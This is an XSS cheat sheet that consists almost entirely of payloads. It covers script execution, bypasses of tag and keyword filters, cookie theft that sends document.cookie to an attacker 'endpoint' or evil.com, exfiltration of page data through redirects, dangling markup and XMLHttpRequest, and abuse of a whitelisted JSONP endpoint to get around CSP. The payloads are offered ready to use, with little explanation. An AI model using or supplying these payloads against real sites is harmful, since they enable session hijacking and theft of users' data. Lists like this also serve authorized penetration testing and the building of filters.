Execute code

XSS without filters

<script>alert()</script>

Bypass <script> tags

<img src="" onerror="alert()">
<body onload="alert()">

Get cookies from another user

<script>document.location.replace("http://endpoint?cookie="+document.cookie)</script>

Without redirection:

<script>document.write('<img src="http://endpoint?cookie='+document.cookie+'"')</script>

Data exfiltration

Exfiltrate current page data

<script>document.location.replace("http://endpoint?data="+document.body.innerText)</script>

Dangling Markup:

<img src="http://endpoint?data=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=

Bypass Chrome Restrictions:

<table background='//endpoint?data=

Using Ajax

<script>
    var getData = new XMLHttpRequest();
    getData.open("GET", "http://page-where-data-is", false);
    getData.send();
    var sendData = new XMLHttpRequest();
    sendData.open("GET", "http://endpoint?data="+getData.responseText, false);
    sendData.send();
</script>

Using JSONP endpoint to abuse CSP whitelist

<script src="http://jsonp-endpoint-which-is-in-whitelist?callback=alert()"></script>

Bypass common filters

You can use .concat() function instead of +

<script>document.location.replace("http://endpoint?cookie=".concat(document.cookie))</script>

To bypass common xss tags filters like <script>, <img>, <a>, <body>

<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>